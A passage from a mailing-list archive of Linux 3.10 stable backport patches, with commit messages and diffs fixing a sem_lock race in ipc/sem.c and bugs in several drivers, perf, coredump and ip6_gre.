The patch is required for all kernels that include the
commit 6d07b68ce16a ("ipc/sem.c: optimize sem_lock()") (3.10?)

The alternative is to revert the patch that introduced the race.

The patch is safe for backporting, i.e. it makes no assumptions
about memory barriers in spin_unlock_wait().

Background:
Here is the race of the current implementation:

Thread A: (simple op)
- does the first "sma->complex_count == 0" test

Thread B: (complex op)
- does sem_lock(): This includes an array scan. But the scan can't
find Thread A, because Thread A does not own sem->lock yet.
- the thread does the operation, increases complex_count,
drops sem_lock, sleeps

Thread A:
- spin_lock(&sem->lock), spin_is_locked(sma->sem_perm.lock)
- sleeps before the complex_count test

Thread C: (complex op)
- does sem_lock (no array scan, complex_count==1)
- wakes up Thread B.
- decrements complex_count

Thread A:
- does the complex_count test

Bug:
Now both thread A and thread C operate on the same array, without
any synchronization.

[js] use set_mb instead of smp_store_mb

Fixes: 6d07b68ce16a ("ipc/sem.c: optimize sem_lock()")
Link: http://lkml.kernel.org/r/1469123695-5661-1-gi...@colorfullife.com
Reported-by: <fel...@informatik.uni-bremen.de>
Cc: "H. Peter Anvin" <h...@zytor.com>
Cc: Peter Zijlstra <pet...@infradead.org>
Cc: Davidlohr Bueso <da...@stgolabs.net>
Cc: Thomas Gleixner <tg...@linutronix.de>
Cc: Ingo Molnar <mi...@elte.hu>
Cc: <1vi...@web.de>
Signed-off-by: Andrew Morton <ak...@linux-foundation.org>
Signed-off-by: Linus Torvalds <torv...@linux-foundation.org>
Signed-off-by: Jiri Slaby <jsl...@suse.cz>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
include/linux/sem.h | 1 +
ipc/sem.c | 129 ++++++++++++++++++++++++++++++----------------------
2 files changed, 76 insertions(+), 54 deletions(-)

diff --git a/include/linux/sem.h b/include/linux/sem.h
index 976ce3a..d0efd6e 100644
--- a/include/linux/sem.h
+++ b/include/linux/sem.h
@@ -21,6 +21,7 @@ struct sem_array {
struct list_head list_id; /* undo requests on this array */
int sem_nsems; /* no. of semaphores in array */
int complex_count; /* pending complex operations */
+ bool complex_mode; /* no parallel simple ops */
};

#ifdef CONFIG_SYSVIPC
diff --git a/ipc/sem.c b/ipc/sem.c
index 57242be..94c6ec5 100644
--- a/ipc/sem.c
+++ b/ipc/sem.c
@@ -155,14 +155,21 @@ static int sysvipc_sem_proc_show(struct seq_file *s, void *it);

/*
* Locking:
+ * a) global sem_lock() for read/write
* sem_undo.id_next,
* sem_array.complex_count,
- * sem_array.pending{_alter,_cont},
- * sem_array.sem_undo: global sem_lock() for read/write
- * sem_undo.proc_next: only "current" is allowed to read/write that field.
+ * sem_array.complex_mode
+ * sem_array.pending{_alter,_const},
+ * sem_array.sem_undo
*
+ * b) global or semaphore sem_lock() for read/write:
* sem_array.sem_base[i].pending_{const,alter}:
- * global or semaphore sem_lock() for read/write
+ * sem_array.complex_mode (for read)
+ *
+ * c) special:
+ * sem_undo_list.list_proc:
+ * * undo_list->lock for write
+ * * rcu for read
*/

#define sc_semmsl sem_ctls[0]
@@ -263,24 +270,25 @@ static void sem_rcu_free(struct rcu_head *head)
#define ipc_smp_acquire__after_spin_is_unlocked() smp_rmb()

/*
- * Wait until all currently ongoing simple ops have completed.
+ * Enter the mode suitable for non-simple operations:
* Caller must own sem_perm.lock.
- * New simple ops cannot start, because simple ops first check
- * that sem_perm.lock is free.
- * that a) sem_perm.lock is free and b) complex_count is 0.
*/
-static void sem_wait_array(struct sem_array *sma)
+static void complexmode_enter(struct sem_array *sma)
{
int i;
struct sem *sem;

- if (sma->complex_count) {
- /* The thread that increased sma->complex_count waited on
- * all sem->lock locks. Thus we don't need to wait again.
- */
+ if (sma->complex_mode) {
+ /* We are already in complex_mode. Nothing to do */
return;
}

+ /* We need a full barrier after seting complex_mode:
+ * The write to complex_mode must be visible
+ * before we read the first sem->lock spinlock state.
+ */
+ set_mb(sma->complex_mode, true);
+
for (i = 0; i < sma->sem_nsems; i++) {
sem = sma->sem_base + i;
spin_unlock_wait(&sem->lock);
@@ -289,6 +297,28 @@ static void sem_wait_array(struct sem_array *sma)
}

/*
+ * Try to leave the mode that disallows simple operations:
+ * Caller must own sem_perm.lock.
+ */
+static void complexmode_tryleave(struct sem_array *sma)
+{
+ if (sma->complex_count) {
+ /* Complex ops are sleeping.
+ * We must stay in complex mode
+ */
+ return;
+ }
+ /*
+ * Immediately after setting complex_mode to false,
+ * a simple op can start. Thus: all memory writes
+ * performed by the current operation must be visible
+ * before we set complex_mode to false.
+ */
+ smp_store_release(&sma->complex_mode, false);
+}
+
+#define SEM_GLOBAL_LOCK (-1)
+/*
* If the request contains only one semaphore operation, and there are
* no complex transactions pending, lock only the semaphore involved.
* Otherwise, lock the entire semaphore array, since we either have
@@ -304,55 +334,42 @@ static inline int sem_lock(struct sem_array *sma, struct sembuf *sops,
/* Complex operation - acquire a full lock */
ipc_lock_object(&sma->sem_perm);

- /* And wait until all simple ops that are processed
- * right now have dropped their locks.
- */
- sem_wait_array(sma);
- return -1;
+ /* Prevent parallel simple ops */
+ complexmode_enter(sma);
+ return SEM_GLOBAL_LOCK;
}

/*
* Only one semaphore affected - try to optimize locking.
- * The rules are:
- * - optimized locking is possible if no complex operation
- * is either enqueued or processed right now.
- * - The test for enqueued complex ops is simple:
- * sma->complex_count != 0
- * - Testing for complex ops that are processed right now is
- * a bit more difficult. Complex ops acquire the full lock
- * and first wait that the running simple ops have completed.
- * (see above)
- * Thus: If we own a simple lock and the global lock is free
- * and complex_count is now 0, then it will stay 0 and
- * thus just locking sem->lock is sufficient.
+ * Optimized locking is possible if no complex operation
+ * is either enqueued or processed right now.
+ *
+ * Both facts are tracked by complex_mode.
*/
sem = sma->sem_base + sops->sem_num;

- if (sma->complex_count == 0) {
+ /*
+ * Initial check for complex_mode. Just an optimization,
+ * no locking, no memory barrier.
+ */
+ if (!sma->complex_mode) {
/*
* It appears that no complex operation is around.
* Acquire the per-semaphore lock.
*/
spin_lock(&sem->lock);

- /* Then check that the global lock is free */
- if (!spin_is_locked(&sma->sem_perm.lock)) {
- /*
- * We need a memory barrier with acquire semantics,
- * otherwise we can race with another thread that does:
- * complex_count++;
- * spin_unlock(sem_perm.lock);
- */
- ipc_smp_acquire__after_spin_is_unlocked();
+ /*
+ * See 51d7d5205d33
+ * ("powerpc: Add smp_mb() to arch_spin_is_locked()"):
+ * A full barrier is required: the write of sem->lock
+ * must be visible before the read is executed
+ */
+ smp_mb();

- /* Now repeat the test of complex_count:
- * It can't change anymore until we drop sem->lock.
- * Thus: if is now 0, then it will stay 0.
- */
- if (sma->complex_count == 0) {
- /* fast path successful! */
- return sops->sem_num;
- }
+ if (!smp_load_acquire(&sma->complex_mode)) {
+ /* fast path successful! */
+ return sops->sem_num;
}
spin_unlock(&sem->lock);
}
@@ -372,15 +389,16 @@ static inline int sem_lock(struct sem_array *sma, struct sembuf *sops,
/* Not a false alarm, thus complete the sequence for a
* full lock.
*/
- sem_wait_array(sma);
- return -1;
+ complexmode_enter(sma);
+ return SEM_GLOBAL_LOCK;
}
}

static inline void sem_unlock(struct sem_array *sma, int locknum)
{
- if (locknum == -1) {
+ if (locknum == SEM_GLOBAL_LOCK) {
unmerge_queues(sma);
+ complexmode_tryleave(sma);
ipc_unlock_object(&sma->sem_perm);
} else {
struct sem *sem = sma->sem_base + locknum;
@@ -540,6 +558,7 @@ static int newary(struct ipc_namespace *ns, struct ipc_params *params)
}

sma->complex_count = 0;
+ sma->complex_mode = true; /* dropped by sem_unlock below */
INIT_LIST_HEAD(&sma->pending_alter);
INIT_LIST_HEAD(&sma->pending_const);
INIT_LIST_HEAD(&sma->list_id);
@@ -2165,10 +2184,10 @@ static int sysvipc_sem_proc_show(struct seq_file *s, void *it)
/*
* The proc interface isn't aware of sem_lock(), it calls
* ipc_lock_object() directly (in sysvipc_find_ipc).
- * In order to stay compatible with sem_lock(), we must wait until
- * all simple semop() calls have left their critical regions.
+ * In order to stay compatible with sem_lock(), we must
+ * enter / leave complex_mode.
*/
- sem_wait_array(sma);
+ complexmode_enter(sma);

sem_otime = get_semotime(sma);

@@ -2185,6 +2204,8 @@ static int sysvipc_sem_proc_show(struct seq_file *s, void *it)
sem_otime,
sma->sem_ctime);

+ complexmode_tryleave(sma);
+
return 0;
}
#endif
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:50:08 PM2/5/17
to
From: Dan Carpenter <dan.ca...@oracle.com>

commit 9a6dc644512fd083400a96ac4a035ac154fe6b8d upstream.

set_bit() and clear_bit() take the bit number so this code is really
doing "1 << (1 << irq)" which is a double shift bug. It's done
consistently so it won't cause a problem unless "irq" is more than 4.

Fixes: 70c6cce04066 ('mfd: Support 88pm80x in 80x driver')
Signed-off-by: Dan Carpenter <dan.ca...@oracle.com>
Signed-off-by: Lee Jones <lee....@linaro.org>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
include/linux/mfd/88pm80x.h | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/include/linux/mfd/88pm80x.h b/include/linux/mfd/88pm80x.h
index e94537b..b55c95d 100644
--- a/include/linux/mfd/88pm80x.h
+++ b/include/linux/mfd/88pm80x.h
@@ -345,7 +345,7 @@ static inline int pm80x_dev_suspend(struct device *dev)
int irq = platform_get_irq(pdev, 0);

if (device_may_wakeup(dev))
- set_bit((1 << irq), &chip->wu_flag);
+ set_bit(irq, &chip->wu_flag);

return 0;
}
@@ -357,7 +357,7 @@ static inline int pm80x_dev_resume(struct device *dev)
int irq = platform_get_irq(pdev, 0);

if (device_may_wakeup(dev))
- clear_bit((1 << irq), &chip->wu_flag);
+ clear_bit(irq, &chip->wu_flag);

return 0;
}
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:50:08 PM2/5/17
to
From: Andrey Ryabinin <arya...@virtuozzo.com>

commit 70d78fe7c8b640b5acfad56ad341985b3810998a upstream.

It could be not possible to freeze coredumping task when it waits for
'core_state->startup' completion, because threads are frozen in
get_signal() before they got a chance to complete 'core_state->startup'.

Inability to freeze a task during suspend will cause suspend to fail.
Also CRIU uses cgroup freezer during dump operation. So with an
unfreezable task the CRIU dump will fail because it waits for a
transition from 'FREEZING' to 'FROZEN' state which will never happen.

Use freezer_do_not_count() to tell freezer to ignore coredumping task
while it waits for core_state->startup completion.

Link: http://lkml.kernel.org/r/1475225434-3753-1-git...@virtuozzo.com
Signed-off-by: Andrey Ryabinin <arya...@virtuozzo.com>
Acked-by: Pavel Machek <pa...@ucw.cz>
Acked-by: Oleg Nesterov <ol...@redhat.com>
Cc: Alexander Viro <vi...@zeniv.linux.org.uk>
Cc: Tejun Heo <t...@kernel.org>
Cc: "Rafael J. Wysocki" <r...@rjwysocki.net>
Cc: Michal Hocko <mho...@kernel.org>
Signed-off-by: Andrew Morton <ak...@linux-foundation.org>
Signed-off-by: Linus Torvalds <torv...@linux-foundation.org>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
fs/coredump.c | 3 +++
1 file changed, 3 insertions(+)

diff --git a/fs/coredump.c b/fs/coredump.c
index 4f03b2b..a94f94d 100644
--- a/fs/coredump.c
+++ b/fs/coredump.c
@@ -1,6 +1,7 @@
#include <linux/slab.h>
#include <linux/file.h>
#include <linux/fdtable.h>
+#include <linux/freezer.h>
#include <linux/mm.h>
#include <linux/stat.h>
#include <linux/fcntl.h>
@@ -375,7 +376,9 @@ static int coredump_wait(int exit_code, struct core_state *core_state)
if (core_waiters > 0) {
struct core_thread *ptr;

+ freezer_do_not_count();
wait_for_completion(&core_state->startup);
+ freezer_count();
/*
* Wait for all the threads to become inactive, so that
* all the thread context (extended register state, like
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:50:09 PM2/5/17
to
From: Oliver Neukum <one...@suse.com>

commit 60bcabd080f53561efa9288be45c128feda1a8bb upstream.

This fixes the oops discovered by the Umap2 project and Alan Stern.
The intf member needs to be set before the firmware is downloaded.

Signed-off-by: Oliver Neukum <one...@suse.com>
Signed-off-by: David S. Miller <da...@davemloft.net>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/net/usb/kaweth.c | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/drivers/net/usb/kaweth.c b/drivers/net/usb/kaweth.c
index afb117c..8ba774d 100644
--- a/drivers/net/usb/kaweth.c
+++ b/drivers/net/usb/kaweth.c
@@ -1031,6 +1031,7 @@ static int kaweth_probe(
kaweth = netdev_priv(netdev);
kaweth->dev = udev;
kaweth->net = netdev;
+ kaweth->intf = intf;

spin_lock_init(&kaweth->device_lock);
init_waitqueue_head(&kaweth->term_wait);
@@ -1141,8 +1142,6 @@ err_fw:

dev_dbg(dev, "Initializing net device.\n");

- kaweth->intf = intf;
-
kaweth->tx_urb = usb_alloc_urb(0, GFP_KERNEL);
if (!kaweth->tx_urb)
goto err_free_netdev;
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:50:09 PM2/5/17
to
From: Lance Richardson <lric...@redhat.com>

commit db32e4e49ce2b0e5fcc17803d011a401c0a637f6 upstream.

Similar to commit 3be07244b733 ("ip6_gre: fix flowi6_proto value in
xmit path"), set flowi6_proto to IPPROTO_GRE for output route lookup.

Up until now, ip6gre_xmit_other() has set flowi6_proto to a bogus value.
This affected output route lookup for packets sent on an ip6gretap device
in cases where routing was dependent on the value of flowi6_proto.

Since the correct proto is already set in the tunnel flowi6 template via
commit 252f3f5a1189 ("ip6_gre: Set flowi6_proto as IPPROTO_GRE in xmit
path."), simply delete the line setting the incorrect flowi6_proto value.

Suggested-by: Jiri Benc <jb...@redhat.com>
Fixes: c12b395a4664 ("gre: Support GRE over IPv6")
Reviewed-by: Shmulik Ladkani <shmulik...@gmail.com>
Signed-off-by: Lance Richardson <lric...@redhat.com>
Signed-off-by: David S. Miller <da...@davemloft.net>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
net/ipv6/ip6_gre.c | 1 -
1 file changed, 1 deletion(-)

diff --git a/net/ipv6/ip6_gre.c b/net/ipv6/ip6_gre.c
index 7eb7267..603f251 100644
--- a/net/ipv6/ip6_gre.c
+++ b/net/ipv6/ip6_gre.c
@@ -890,7 +890,6 @@ static int ip6gre_xmit_other(struct sk_buff *skb, struct net_device *dev)
encap_limit = t->parms.encap_limit;

memcpy(&fl6, &t->fl.u.ip6, sizeof(fl6));
- fl6.flowi6_proto = skb->protocol;

err = ip6gre_xmit2(skb, dev, 0, &fl6, encap_limit, &mtu);

--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:50:09 PM2/5/17
to
From: Krzysztof Kozlowski <kr...@kernel.org>

commit f37fabb8643eaf8e3b613333a72f683770c85eca upstream.

In the critical sysfs entry the thermal hwmon was returning wrong
temperature to the user-space. It was reporting the temperature of the
first trip point instead of the temperature of critical trip point.

For example:
/sys/class/hwmon/hwmon0/temp1_crit:50000
/sys/class/thermal/thermal_zone0/trip_point_0_temp:50000
/sys/class/thermal/thermal_zone0/trip_point_0_type:active
/sys/class/thermal/thermal_zone0/trip_point_3_temp:120000
/sys/class/thermal/thermal_zone0/trip_point_3_type:critical

Since commit e68b16abd91d ("thermal: add hwmon sysfs I/F") the driver
have been registering a sysfs entry if get_crit_temp() callback was
provided. However when accessed, it was calling get_trip_temp() instead
of the get_crit_temp().

Fixes: e68b16abd91d ("thermal: add hwmon sysfs I/F")
Signed-off-by: Krzysztof Kozlowski <kr...@kernel.org>
Signed-off-by: Zhang Rui <rui....@intel.com>
[wt: s/thermal_hwmon.c/thermal_core.c in 3.10]

Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/thermal/thermal_core.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/thermal/thermal_core.c b/drivers/thermal/thermal_core.c
index d755440..f9bf597 100644
--- a/drivers/thermal/thermal_core.c
+++ b/drivers/thermal/thermal_core.c
@@ -924,7 +924,7 @@ temp_crit_show(struct device *dev, struct device_attribute *attr,
long temperature;
int ret;

- ret = tz->ops->get_trip_temp(tz, 0, &temperature);
+ ret = tz->ops->get_crit_temp(tz, &temperature);
if (ret)
return ret;

--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:50:09 PM2/5/17
to
From: Arnaldo Carvalho de Melo <ac...@redhat.com>

commit 432746f8e0b6a82ba832b771afe31abd51af6752 upstream.

When we call symbol__fixup_duplicate() we use algorithms to pick the
"best" symbols for cases where there are various functions/aliases to an
address, and those check zero size symbols, which, before calling
symbol__fixup_end() are _all_ symbols in a just parsed kallsyms file.

So first fixup the end, then fixup the duplicates.

Found while trying to figure out why 'perf test vmlinux' failed, see the
output of 'perf test -v vmlinux' to see cases where the symbols picked
as best for vmlinux don't match the ones picked for kallsyms.

Cc: Anton Blanchard <an...@samba.org>
Cc: Adrian Hunter <adrian...@intel.com>
Cc: David Ahern <dsa...@gmail.com>
Cc: Jiri Olsa <jo...@kernel.org>
Cc: Masami Hiramatsu <mhir...@kernel.org>
Cc: Namhyung Kim <namh...@kernel.org>
Cc: Wang Nan <wang...@huawei.com>
Fixes: 694bf407b061 ("perf symbols: Add some heuristics for choosing the best duplicate symbol")
Link: http://lkml.kernel.org/n/tip-rxqvdgr0mq...@git.kernel.org
Signed-off-by: Arnaldo Carvalho de Melo <ac...@redhat.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
tools/perf/util/symbol-elf.c | 2 +-
tools/perf/util/symbol.c | 2 +-
2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/tools/perf/util/symbol-elf.c b/tools/perf/util/symbol-elf.c
index 4b12bf8..f7718c8 100644
--- a/tools/perf/util/symbol-elf.c
+++ b/tools/perf/util/symbol-elf.c
@@ -831,8 +831,8 @@ new_symbol:
* For misannotated, zeroed, ASM function sizes.
*/
if (nr > 0) {
- symbols__fixup_duplicate(&dso->symbols[map->type]);
symbols__fixup_end(&dso->symbols[map->type]);
+ symbols__fixup_duplicate(&dso->symbols[map->type]);
if (kmap) {
/*
* We need to fixup this here too because we create new
diff --git a/tools/perf/util/symbol.c b/tools/perf/util/symbol.c
index 8cf3b54..a2fe760 100644
--- a/tools/perf/util/symbol.c
+++ b/tools/perf/util/symbol.c
@@ -673,8 +673,8 @@ int dso__load_kallsyms(struct dso *dso, const char *filename,
if (dso__load_all_kallsyms(dso, filename, map) < 0)
return -1;

- symbols__fixup_duplicate(&dso->symbols[map->type]);
symbols__fixup_end(&dso->symbols[map->type]);
+ symbols__fixup_duplicate(&dso->symbols[map->type]);

if (dso->kernel == DSO_TYPE_GUEST_KERNEL)
dso->symtab_type = DSO_BINARY_TYPE__GUEST_KALLSYMS;
--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:50:09 PM2/5/17
to
From: Brian Norris <brian...@chromium.org>

commit fcd2042e8d36cf644bd2d69c26378d17158b17df upstream.

SSIDs aren't guaranteed to be 0-terminated. Let's cap the max length
when we print them out.

This can be easily noticed by connecting to a network with a 32-octet
SSID:

[ 3903.502925] mwifiex_pcie 0000:01:00.0: info: trying to associate to
'0123456789abcdef0123456789abcdef <uninitialized mem>' bssid
xx:xx:xx:xx:xx:xx

Fixes: 5e6e3a92b9a4 ("wireless: mwifiex: initial commit for Marvell mwifiex driver")
Signed-off-by: Brian Norris <brian...@chromium.org>
Acked-by: Amitkumar Karwar <aka...@marvell.com>
Signed-off-by: Kalle Valo <kv...@codeaurora.org>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/net/wireless/mwifiex/cfg80211.c | 13 +++++++------
1 file changed, 7 insertions(+), 6 deletions(-)

diff --git a/drivers/net/wireless/mwifiex/cfg80211.c b/drivers/net/wireless/mwifiex/cfg80211.c
index e7f7cdf..fa0e45b 100644
--- a/drivers/net/wireless/mwifiex/cfg80211.c
+++ b/drivers/net/wireless/mwifiex/cfg80211.c
@@ -1633,8 +1633,9 @@ done:
is_scanning_required = 1;
} else {
dev_dbg(priv->adapter->dev,
- "info: trying to associate to '%s' bssid %pM\n",
- (char *) req_ssid.ssid, bss->bssid);
+ "info: trying to associate to '%.*s' bssid %pM\n",
+ req_ssid.ssid_len, (char *)req_ssid.ssid,
+ bss->bssid);
memcpy(&priv->cfg_bssid, bss->bssid, ETH_ALEN);
break;
}
@@ -1675,8 +1676,8 @@ mwifiex_cfg80211_connect(struct wiphy *wiphy, struct net_device *dev,
return -EINVAL;
}

- wiphy_dbg(wiphy, "info: Trying to associate to %s and bssid %pM\n",
- (char *) sme->ssid, sme->bssid);
+ wiphy_dbg(wiphy, "info: Trying to associate to %.*s and bssid %pM\n",
+ (int)sme->ssid_len, (char *)sme->ssid, sme->bssid);

ret = mwifiex_cfg80211_assoc(priv, sme->ssid_len, sme->ssid, sme->bssid,
priv->bss_mode, sme->channel, sme, 0);
@@ -1799,8 +1800,8 @@ mwifiex_cfg80211_join_ibss(struct wiphy *wiphy, struct net_device *dev,
goto done;
}

- wiphy_dbg(wiphy, "info: trying to join to %s and bssid %pM\n",
- (char *) params->ssid, params->bssid);
+ wiphy_dbg(wiphy, "info: trying to join to %.*s and bssid %pM\n",
+ params->ssid_len, (char *)params->ssid, params->bssid);

mwifiex_set_ibss_params(priv, params);

--
2.8.0.rc2.1.gbe9624a

Willy Tarreau

unread,
Feb 5, 2017, 2:50:10 PM2/5/17
to
From: Yoshihiro Shimoda <yoshihiro....@renesas.com>

commit 519d8bd4b5d3d82c413eac5bb42b106bb4b9ec15 upstream.

The previous driver is possible to stop the transfer wrongly.
For example:
1) An interrupt happens, but not BRDY interruption.
2) Read INTSTS0. And than state->intsts0 is not set to BRDY.
3) BRDY is set to 1 here.
4) Read BRDYSTS.
5) Clear the BRDYSTS. And then. the BRDY is cleared wrongly.

Remarks:
- The INTSTS0.BRDY is read only.
- If any bits of BRDYSTS are set to 1, the BRDY is set to 1.
- If BRDYSTS is 0, the BRDY is set to 0.

So, this patch adds condition to avoid such situation. (And about
NRDYSTS, this is not used for now. But, avoiding any side effects,
this patch doesn't touch it.)

Fixes: d5c6a1e024dd ("usb: renesas_usbhs: fixup interrupt status clear method")
Signed-off-by: Yoshihiro Shimoda <yoshihiro....@renesas.com>
Signed-off-by: Felipe Balbi <felipe...@linux.intel.com>
Signed-off-by: Willy Tarreau <w...@1wt.eu>
---
drivers/usb/renesas_usbhs/mod.c | 11 +++++++++--
1 file changed, 9 insertions(+), 2 deletions(-)

diff --git a/drivers/usb/renesas_usbhs/mod.c b/drivers/usb/renesas_usbhs/mod.c
index 6a030b9..254194d 100644
--- a/drivers/usb/renesas_usbhs/mod.c
+++ b/drivers/usb/renesas_usbhs/mod.c
@@ -272,9 +272,16 @@ static irqreturn_t usbhs_interrupt(int irq, void *data)
usbhs_write(priv, INTSTS0, ~irq_state.intsts0 & INTSTS0_MAGIC);
usbhs_write(priv, INTSTS1, ~irq_state.intsts1 & INTSTS1_MAGIC);

- usbhs_write(priv, BRDYSTS, ~irq_state.brdysts);
+ /*
+ * The driver should not clear the xxxSTS after the line of
+ * "call irq callback functions" because each "if" statement is
+ * possible to call the callback function for avoiding any side effects.
+ */
+ if (irq_state.intsts0 & BRDY)
+ usbhs_write(priv, BRDYSTS, ~irq_state.brdysts);
usbhs_write(priv, NRDYSTS, ~irq_state.nrdysts);
- usbhs_write(priv, BEMPSTS, ~irq_state.bempsts);
+ if (irq_state.intsts0 & BEMP)
+ usbhs_write(priv, BEMPSTS, ~irq_state.bempsts);

/*
* call irq callback functions
--
2.8.0.rc2.1.gbe9624a
It is loading more messages.
0 new messages